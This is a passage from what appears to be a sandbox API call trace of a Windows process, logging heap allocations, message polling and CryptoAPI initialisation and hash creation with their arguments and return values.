lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0227.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0227.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0227.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0227.671] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0227.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0227.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.711] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0227.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0227.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0227.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0227.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0227.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69ac8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0227.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0227.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69c28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0227.712] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0227.712] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0227.714] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.714] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.714] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0227.714] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f040e0 | out: hHeap=0x970000) returned 1 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0227.715] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.715] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.715] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0227.715] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0227.715] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.715] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0227.715] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0227.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0227.716] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.716] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0227.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0227.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0227.716] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0227.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.716] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0227.716] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0227.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0227.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0227.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.716] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.717] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.717] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.717] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.717] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.717] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0227.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0227.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.717] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.717] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0227.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042d8 | out: hHeap=0x970000) returned 1 [0227.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0227.717] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0227.717] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0227.718] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.718] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0227.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0227.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0227.718] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0227.718] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0227.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0227.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0227.718] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.718] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.718] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.718] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0227.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.718] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.718] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0227.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0227.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.718] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.719] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0227.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0227.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0227.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0227.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0227.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0227.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0227.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0227.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0227.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0227.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0227.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0227.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0227.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0227.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0227.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0227.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0227.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0227.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0227.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0227.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0227.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0227.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0227.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0227.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0227.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0227.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0227.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0227.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0227.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0227.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0227.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0227.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0227.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0227.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0227.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51388, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0227.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0227.722] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0227.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0227.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0227.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0227.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0227.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0227.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0227.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0227.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0227.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0227.723] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0227.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0227.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0227.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0227.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0227.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0227.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0227.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0227.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0227.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0227.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0227.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0227.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0227.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0227.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 